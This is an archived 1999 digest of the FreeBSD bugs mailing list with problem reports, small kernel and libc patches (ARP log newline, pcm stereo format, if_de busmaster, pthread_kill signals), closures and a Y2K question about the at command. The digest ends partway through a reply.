From owner-freebsd-bugs Sun Oct 17 3:37:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 05D8D15094; Sun, 17 Oct 1999 03:37:42 -0700 (PDT) (envelope-from ache@FreeBSD.org) Received: (from ache@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA51799; Sun, 17 Oct 1999 03:37:42 -0700 (PDT) (envelope-from ache@FreeBSD.org) Date: Sun, 17 Oct 1999 03:37:42 -0700 (PDT) From: Message-Id: <199910171037.DAA51799@freefall.freebsd.org> To: stephane@lituus.fr, ache@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/7781: Problem with setpassent(), getpwnam() and getpwuid() functions in libc Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Problem with setpassent(), getpwnam() and getpwuid() functions in libc State-Changed-From-To: open->closed State-Changed-By: ache State-Changed-When: Sun Oct 17 03:35:41 PDT 1999 State-Changed-Why: Fix applied To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 4:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EAF9114C22 for ; Sun, 17 Oct 1999 04:10:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA57621; Sun, 17 Oct 1999 04:10:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from martini.ics.es.osaka-u.ac.jp (martini.ics.es.osaka-u.ac.jp [133.1.12.150]) by hub.freebsd.org (Postfix) with ESMTP id A42FF1544D for ; Sun, 17 Oct 1999 04:06:58 -0700 (PDT) (envelope-from matusita@jp.FreeBSD.org) Received: from localhost (localhost [127.0.0.1]) by martini.ics.es.osaka-u.ac.jp (8.9.3/3.7W/INO-1.0v8-SLAVE) with ESMTP id UAA77882 for ; Sun, 17 Oct 1999 20:06:57 +0900 (JST) Message-Id: <19991017200654U.matusita@jp.FreeBSD.org> Date: Sun, 17 Oct 1999 20:06:54 +0900 From: Makoto MATSUSHITA To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14368: Update compat3x distribution Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14368 >Category: bin >Synopsis: Update compat3x distribution >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Oct 17 04:10:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Makoto MATSUSHITA >Release: FreeBSD 4.0-CURRENT i386 >Organization: Japan FreeBSD Users' Group >Environment: current 4.0-CURRENT >Description: In early October/1999, we have met version bump of standard libraries such as libc, libftpio, etc. However, current 4.0-CURRENT does not have old (shared) library. >How-To-Repeat: Install 4.0-CURRENT to a naked PC, and run old binaries. >Fix: Put (shared) libraries to src/lib/compat/compat3x ASAP. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 6:40: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F154F14C3D for ; Sun, 17 Oct 1999 06:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA14721; Sun, 17 Oct 1999 06:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from yoda.pi.musin.de (yoda.pi.musin.de [194.246.250.12]) by hub.freebsd.org (Postfix) with ESMTP id CD22814C3D for ; Sun, 17 Oct 1999 06:31:43 -0700 (PDT) (envelope-from sec@pi.musin.de) Received: by yoda.pi.musin.de (Postfix, from userid 4242) id EBC7C349; Sun, 17 Oct 1999 15:31:41 +0200 (CEST) Message-Id: <19991017133141.EBC7C349@yoda.pi.musin.de> Date: Sun, 17 Oct 1999 15:31:41 +0200 (CEST) From: sec@pi.musin.de Reply-To: sec@yoda.pi.musin.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14371: Log message is missing n Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14371 >Category: kern >Synopsis: Log message is missing \n >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 17 06:40:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Stefan `Sec` Zehl >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: $FreeBSD: src/sys/netinet/if_ether.c,v 1.52.2.5 1999/09/16 00:50:37 lile Exp $ >Description: The 'attempts to overwrite permanent arp entry' message is missing a \n at the end. See the following output-snippet of /etc/security yoda kernel log messages: > arp: 00:50:04:3d:38:14 attempts to modify permanent entry for 194.246.250.0 on ep0<3>arp: 00:50:04:3d:38:14 attempts to modify permanent entry for 194.246.250.0 on ep0<6>nfs server ewok:/usr/ports: not responding >How-To-Repeat: >Fix: --- /usr/src/sys/netinet/if_ether.c Thu Sep 16 19:23:25 1999 +++ /tmp/if_ether.c Sun Oct 17 15:30:03 1999 @@ -556,7 +556,7 @@ ac->ac_if.if_name, ac->ac_if.if_unit); else { log(LOG_ERR, - "arp: %6D attempts to modify permanent entry for %s on %s%d", + "arp: %6D attempts to modify permanent entry for %s on %s%d\n", ea->arp_sha, ":", inet_ntoa(isaddr), ac->ac_if.if_name, ac->ac_if.if_unit); goto reply; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 6:52:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from front3m.grolier.fr (front3m.grolier.fr [195.36.216.53]) by hub.freebsd.org (Postfix) with ESMTP id 567CE14D19 for ; Sun, 17 Oct 1999 06:52:44 -0700 (PDT) (envelope-from pushf@club-internet.fr) Received: from club-internet.fr (Blois-2-186.club-internet.fr [195.36.135.186]) by front3m.grolier.fr (8.9.3/No_Relay+No_Spam_MGC990224) with ESMTP id PAA25639 for ; Sun, 17 Oct 1999 15:52:42 +0200 (MET DST) Message-ID: <3809D4F3.E741E1ED@club-internet.fr> Date: Sun, 17 Oct 1999 15:53:55 +0200 From: =?iso-8859-1?Q?Pierre=2DFran=E7ois?= LAURAND X-Mailer: Mozilla 4.6 [fr] (Win98; I) X-Accept-Language: fr MIME-Version: 1.0 To: freebsd-bugs@freebsd.org Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 809f9356 unsubscribe freebsd-bugs pushf@club-internet.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 8:10: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9700014CB9 for ; Sun, 17 Oct 1999 08:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA20681; Sun, 17 Oct 1999 08:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from skalman.campus.luth.se (skalman.campus.luth.se [130.240.197.52]) by hub.freebsd.org (Postfix) with ESMTP id 45CCC14A03 for ; Sun, 17 Oct 1999 08:01:40 -0700 (PDT) (envelope-from pantzer@skalman.campus.luth.se) Received: (from pantzer@localhost) by skalman.campus.luth.se (8.9.3/8.8.8) id RAA00509; Sun, 17 Oct 1999 17:01:39 +0200 (CEST) (envelope-from pantzer) Message-Id: <199910171501.RAA00509@skalman.campus.luth.se> Date: Sun, 17 Oct 1999 17:01:39 +0200 (CEST) From: pantzer@ludd.luth.se Reply-To: pantzer@ludd.luth.se To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/14372: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14372 >Category: i386 >Synopsis: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 17 08:10:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Mattias Pantzare >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: FreeBSD-current from 991017. Soundcad supported by pcm. >Description: splay plays mp3 at low speed. The problem is that it tries to set stereo but gets mono. SNDCTL_DSP_SETFMT now resets the AFMT_STERO bit. This was not the case in earlier kernels (from 990901 for example) >How-To-Repeat: Run splay. >Fix: Index: dsp.c =================================================================== RCS file: /host/queeg.ludd/FreeBSD-mirror/anoncvs/cvs//src/sys/dev/pcm/dsp.c,v retrieving revision 1.5 diff -c -r1.5 dsp.c *** dsp.c 1999/09/28 21:43:35 1.5 --- dsp.c 1999/10/17 14:58:18 *************** *** 387,395 **** case SNDCTL_DSP_SETFMT: /* sets _one_ format */ splx(s); ! if (wrch) chn_setformat(wrch, *arg_i); ! if (rdch) chn_setformat(rdch, *arg_i); ! *arg_i = wrch? wrch->format : rdch->format; break; case SNDCTL_DSP_SUBDIVIDE: --- 387,395 ---- case SNDCTL_DSP_SETFMT: /* sets _one_ format */ splx(s); ! if (wrch) chn_setformat(wrch, (*arg_i) | (wrch->format & AFMT_STEREO)); ! if (rdch) chn_setformat(rdch, (*arg_i) | (rdch->format & AFMT_STEREO)); ! *arg_i = wrch? (wrch->format & ~AFMT_STEREO) : (rdch->format & ~AFMT_STEREO); break; case SNDCTL_DSP_SUBDIVIDE: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 11:40: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0027B14F1D for ; Sun, 17 Oct 1999 11:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA31520; Sun, 17 Oct 1999 11:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mout00.kundenserver.de (mout00.kundenserver.de [195.20.224.69]) by hub.freebsd.org (Postfix) with ESMTP id 357BB14C28 for ; Sun, 17 Oct 1999 11:37:05 -0700 (PDT) (envelope-from kjwolf@seismic.de) Received: from [195.20.224.75] (helo=mrelay00.kundenserver.de) by mout00.kundenserver.de with esmtp (Exim 2.12 #2) id 11cvB0-00007k-00 for FreeBSD-gnats-submit@freebsd.org; Sun, 17 Oct 1999 20:37:02 +0200 Received: from [62.157.65.243] (helo=solling.seismic.de) by mrelay00.kundenserver.de with esmtp (Exim 2.12 #2) id 11cvAy-0007NL-00 for FreeBSD-gnats-submit@freebsd.org; Sun, 17 Oct 1999 20:37:01 +0200 Received: (from kjwolf@localhost) by solling.seismic.de (8.9.3/8.9.3) id UAA00424; Sun, 17 Oct 1999 20:37:14 +0200 (CEST) (envelope-from kjwolf) Message-Id: <199910171837.UAA00424@solling.seismic.de> Date: Sun, 17 Oct 1999 20:37:14 +0200 (CEST) From: kjwolf@seismic.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/14373: Boot problems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14373 >Category: i386 >Synopsis: Error while booting from floppy disk >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 17 11:40:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Klaus-Juergen Wolf >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: Pentium II 300 / 96 MB RAM (IBM Aptiva model) >Description: While booting from the boot floppies created with "make release" from the CVS Repository, either with 3.3-RELEASE and 3.3-STABLE (SNAP-19991016), the first boot disk stops with the error messages: zf_read: fill error elf_loadexec: archsw.readin failed I've never tried a re-installation with distribution code made from the CVS Repository before, therefore there might be a problem with my current software installation in the process of creating the floppy images. >How-To-Repeat: As described. >Fix: unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 13:40: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9766314E78 for ; Sun, 17 Oct 1999 13:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA39025; Sun, 17 Oct 1999 13:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mail0.atl.bellsouth.net (mail0.atl.bellsouth.net [205.152.0.27]) by hub.freebsd.org (Postfix) with ESMTP id C710C15139 for ; Sun, 17 Oct 1999 13:36:35 -0700 (PDT) (envelope-from wghicks@bellsouth.net) Received: from wghicks.bellsouth.net (host-216-78-46-111.ath.bellsouth.net [216.78.46.111]) by mail0.atl.bellsouth.net (3.3.4alt/0.75.2) with ESMTP id QAA20196 for ; Sun, 17 Oct 1999 16:34:12 -0400 (EDT) Received: (from wghicks@localhost) by wghicks.bellsouth.net (8.9.3/8.9.2) id QAA01111; Sun, 17 Oct 1999 16:41:14 -0400 (EDT) (envelope-from wghicks) Message-Id: <199910172041.QAA01111@bellsouth.net> Date: Sun, 17 Oct 1999 16:41:14 -0400 (EDT) From: wghicks@bellsouth.net Reply-To: wghicks@bellsouth.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14380: [PATCH] if_de workaround for when BIOS doesn't set busmaster Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14380 >Category: kern >Synopsis: [PATCH] if_de workaround for when BIOS doesn't set busmaster >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 17 13:40:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: W Gerald Hicks >Release: FreeBSD 4.0-CURRENT i386 >Organization: Fair Play, Uninc. >Environment: Ziatech CompactPCI ZT5510/ZT6650 FreeBSD zilch.bellsouth.net 4.0-CURRENT FreeBSD 4.0-CURRENT \ #0: Sun Oct 17 17:23:34 GMT 1999 \ root@zilch.bellsouth.net:/usr/src/sys/compile/ZILCH i386 >Description: Apparently the Ziatech BIOS doesn't enable busmastering for their Dec/Intel 21X4X devices, causing the cards to fail initialization with the message: 'deX: autosense failed: cable problem?' After investigating the problem for some time, Mike Smith suggested setting the PCI configuration busmaster bit. Thanks Mike! This solved the problem and makes FreeBSD work for several models of Ziatech CompactPCI systems here. I'm not sure if this should be dealt with at a higher level but this driver specific patch got me going here :-) >How-To-Repeat: 100% reproducible. >Fix: --- src/sys/pci/if_de.c.orig Sat Sep 25 12:06:00 1999 +++ src/sys/pci/if_de.c Sun Oct 17 18:33:32 1999 @@ -81,6 +81,7 @@ #include #include +#include #include #include @@ -5136,6 +5137,7 @@ #endif int retval, idx; u_int32_t revinfo, cfdainfo, id; + u_int32_t cfcsinfo; #if !defined(TULIP_IOMAPPED) vm_offset_t pa_csrs; #endif @@ -5154,6 +5156,37 @@ revinfo = pci_conf_read(config_id, PCI_CFRV) & 0xFF; id = pci_conf_read(config_id, PCI_CFID); cfdainfo = pci_conf_read(config_id, PCI_CFDA); + cfcsinfo = pci_conf_read(config_id, PCI_CFCS); + +#if defined(TULIP_DEBUG) + printf(" revinfo = 0x%02x\n", revinfo); + printf(" id = 0x%08x\n", id); + printf(" cfdainfo = 0x%08x\n", cfdainfo); + printf(" cfcsinfo = 0x%08x\n", cfcsinfo); +#endif + + /* turn busmaster on in case BIOS doesn't set it */ + if(!(cfcsinfo & PCIM_CMD_BUSMASTEREN)) { + printf("de%d: enabling busmaster operation\n", unit); + cfcsinfo |= PCIM_CMD_BUSMASTEREN; + pci_conf_write(config_id, PCI_CFCS, cfcsinfo); + } + +#if 0 +#if defined(TULIP_IOMAPPED) + /* XXX - "other operating systems" set this bit too */ + if(!(cfcsinfo & PCIM_CMD_PORTEN)) { + printf("de%d: enabling port mapped operation\n", unit); + cfcsinfo |= PCIM_CMD_PORTEN; + pci_conf_write(config_id, PCI_CFCS, cfcsinfo); + } +#endif +#endif + +#if defined(TULIP_DEBUG) + printf(" cfcsinfo = 0x%08x\n", + (unsigned) pci_conf_read(config_id, PCI_CFCS)); +#endif if (PCI_VENDORID(id) == DEC_VENDORID) { if (PCI_CHIPID(id) == CHIPID_21040) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 15:30:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 715F51501D for ; Sun, 17 Oct 1999 15:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA44639; Sun, 17 Oct 1999 15:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from ag-gw.muc.de (ag-gw.muc.de [193.149.48.126]) by hub.freebsd.org (Postfix) with ESMTP id 4ACF514DFD for ; Sun, 17 Oct 1999 15:23:07 -0700 (PDT) (envelope-from ag@ag-gw.muc.de) Received: (from ag@localhost) by ag-gw.muc.de (8.9.3/8.9.2) id AAA66637; Mon, 18 Oct 1999 00:23:06 +0200 (CEST) (envelope-from ag) Message-Id: <199910172223.AAA66637@ag-gw.muc.de> Date: Mon, 18 Oct 1999 00:23:06 +0200 (CEST) From: ag@muc.de Reply-To: ag@muc.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/14383: Probable bug in phtread_kill() (both RELENG_3 and CURRENT) ? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14383 >Category: i386 >Synopsis: pthread_kill() does not call sighandler of specific thread >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 17 15:30:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Armin Gruner >Release: FreeBSD 3.2-RELEASE i386 >Organization: muc.de >Environment: Standard 3.2 RELEASE installation (sources upgraded to RELENG_3 AND CURRENT, source of pthreads did not change there) >Description: If using pthread_kill(), the signal handler is not called, if the specific thread is e.g. sleep()ing. Only EINTR is returned. >How-To-Repeat: Run /usr/src/lib/libc_r/test/sigsuspend. The test will fail because the signal handler does not get called that many times than expected. >Fix: (applies both to RELENG_3 and CURRENT) If the thread which should be signalled is in SLEEP_WAIT, SELECT_WAIT and similar states, *RECORD* the signal in the sigpending mask, as done in other states too: Index: uthread_kill.c =================================================================== RCS file: /usr/FreeBSD-CVS/src/lib/libc_r/uthread/uthread_kill.c,v retrieving revision 1.5.2.3 diff -u -w -r1.5.2.3 uthread_kill.c --- uthread_kill.c 1999/08/29 14:55:57 1.5.2.3 +++ uthread_kill.c 1999/10/17 21:19:08 @@ -109,11 +109,8 @@ /* Return the signal number: */ pthread->signo = sig; - } else { - /* Increment the pending signal count: */ - sigaddset(&pthread->sigpend,sig); } - break; + /* fallthrough */ default: /* Increment the pending signal count: */ >Release-Note: >Audit-Trail: >Unformatted: if this thread is sleeping (thread is only getting EINTR) Class: sw-bug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 17 17:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E5FD214F64 for ; Sun, 17 Oct 1999 17:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA50411; Sun, 17 Oct 1999 17:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Sun, 17 Oct 1999 17:10:01 -0700 (PDT) Message-Id: <199910180010.RAA50411@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Don Croyle Subject: Re: misc/14104: DISTFILES name clash between release/Makefile and bsd.port.mk Reply-To: Don Croyle Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/14104; it has been noted by GNATS. From: Don Croyle To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: misc/14104: DISTFILES name clash between release/Makefile and bsd.port.mk Date: 17 Oct 1999 19:00:46 -0500 On further experimentation, this is a problem even if DISTFILES is specified on the make command line. Using tcsh as my shell, though I doubt that it matters. em:/usr/src/release# make release DISTFILES=/usr/rel-dist RELEASETAG=RELENG_3 CHROOTDIR=/usr/release [some hours pass] Making docs... ===> Extracting for docproj-1.1 >> No MD5 checksum file. ===> Patching for docproj-1.1 ===> Configuring for docproj-1.1 ===> Installing for docproj-1.1 ===> docproj-1.1 depends on executable: instant - not found ===> Verifying install for instant in /usr/ports/textproc/sgmlformat >> /usr/rel-dist doesn't seem to exist on this system. >> Attempting to fetch from http://fallout.campusview.indiana.edu/ports/distfiles/. fetch: /usr/rel-dist: fallout.campusview.indiana.edu: HTTP server returned error code 404 >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. fetch: skipping double slash in FTP URL; see man page or RFC1738. fetch: ftp.FreeBSD.org: usr: File unavailable (e.g., file not found, no access) >> Couldn't fetch it - please try to retrieve this >> port manually into /usr/ports/distfiles/ and try again. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 0: 0:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 52A7114A2D; Mon, 18 Oct 1999 00:00:57 -0700 (PDT) (envelope-from bp@FreeBSD.org) Received: (from bp@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA81014; Mon, 18 Oct 1999 00:00:57 -0700 (PDT) (envelope-from bp@FreeBSD.org) Date: Mon, 18 Oct 1999 00:00:57 -0700 (PDT) From: Message-Id: <199910180700.AAA81014@freefall.freebsd.org> To: dnelson@emsphone.com, bp@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14168: netstat -ss doesn't work for ipx Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: netstat -ss doesn't work for ipx State-Changed-From-To: open->closed State-Changed-By: bp State-Changed-When: Sun Oct 17 22:47:06 PDT 1999 State-Changed-Why: Committed. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 0:15: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mailhub1.stratus.com (mailhub.stratus.com [134.111.1.15]) by hub.freebsd.org (Postfix) with ESMTP id 300C114A2D for ; Mon, 18 Oct 1999 00:14:52 -0700 (PDT) (envelope-from Pradesh_Chanderpaul@stratus.com) Received: from exna1.stratus.com (exna1.stratus.com [134.111.200.65]) by mailhub1.stratus.com (8.9.3/8.9.3) with ESMTP id DAA05619; Mon, 18 Oct 1999 03:15:28 -0400 (EDT) Received: by exna1.stratus.com with Internet Mail Service (5.5.2448.0) id <43V9RFBT>; Mon, 18 Oct 1999 03:17:05 -0400 Message-ID: <1D1A4EF7AD4DD211A80D00A0C9D7DB667E6841@exna1.stratus.com> From: "Chanderpaul, Pradesh" To: "'freebsd-bugs@FreeBSD.ORG'" Cc: "'pradesh.chanderpaul@iname.com'" Subject: Y2K concern for at command Date: Mon, 18 Oct 1999 03:17:03 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Reading the man pages for the 'at' command, I notice that year format is displayed as YY (as opposed to YYYY). I wonder how someone will enter an at command to run past the 31 Dec 1999 date. Also how would the FreeBSD handle it. I am running FreeBSD 3.2-RELEASE. I have two FreeBSD boxes that are connected via a crossover cable. One runs 3.2-RELEASE and the other 2.2.8-RELEASE. I am able to do testing on the 2.2.8 one if you need me to. If you intend replying to this mail, please send to :- pradesh.chanderpaul@iname.com Regards, Pradesh =============================================================== Pradesh Chanderpaul Phone: +27 12 663 3260/6 Stratus Computer Systems FAX : +27 12 663 3281 South Africa CAC Email: Pradesh_Chanderpaul@stratus.com =============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 2: 0: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8CD8E14D10 for ; Mon, 18 Oct 1999 02:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA89747; Mon, 18 Oct 1999 02:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mailhost.tue.nl (mailhost.tue.nl [131.155.2.5]) by hub.freebsd.org (Postfix) with ESMTP id 791AD14DAB for ; Mon, 18 Oct 1999 01:57:32 -0700 (PDT) (envelope-from edwin@bw2.baub.bwk.tue.nl) Received: from bw2.baub.bwk.tue.nl [131.155.132.36] by mailhost.tue.nl (8.9.3) for id KAA28972 (ESMTP); Mon, 18 Oct 1999 10:57:31 +0200 (MDT) Received: (from edwin@localhost) by bw2.baub.bwk.tue.nl (8.9.3/8.8.8) id KAA13372; Mon, 18 Oct 1999 10:57:31 +0200 (CEST) (envelope-from edwin) Message-Id: <199910180857.KAA13372@bw2.baub.bwk.tue.nl> Date: Mon, 18 Oct 1999 10:57:31 +0200 (CEST) From: Edwin Groothuis Reply-To: Edwin Groothuis To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14394: kernel panic when asking help in visual userconfig Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14394 >Category: kern >Synopsis: kernel panic when asking help in visual userconfig >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 18 02:00:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Edwin Groothuis >Release: FreeBSD 3.3-RELEASE i386 >Organization: - >Environment: visual device user configuration >Description: When in the visual user configuration and I ask for help and press space several times to get aa the bottom, at the last time space is entered the kernel will stop with a kernel-panic. >How-To-Repeat: Reset your computer. Enter "boot user_config" Enter "visual" Enter "?" for help Press space a couple of times Computer will hang with a kernel panic >Fix: - >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 3:56:19 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 68F0614BC3 for ; Mon, 18 Oct 1999 03:56:13 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.040 #1) id 11dASP-00025R-00; Mon, 18 Oct 1999 12:56:01 +0200 From: Sheldon Hearn To: pradesh.chanderpaul@iname.com Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: Y2K concern for at command In-reply-to: Your message of "Mon, 18 Oct 1999 03:17:03 -0400." <1D1A4EF7AD4DD211A80D00A0C9D7DB667E6841@exna1.stratus.com> Date: Mon, 18 Oct 1999 12:56:01 +0200 Message-ID: <8024.940244161@axl.noc.iafrica.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 18 Oct 1999 03:17:03 -0400, "Chanderpaul, Pradesh" 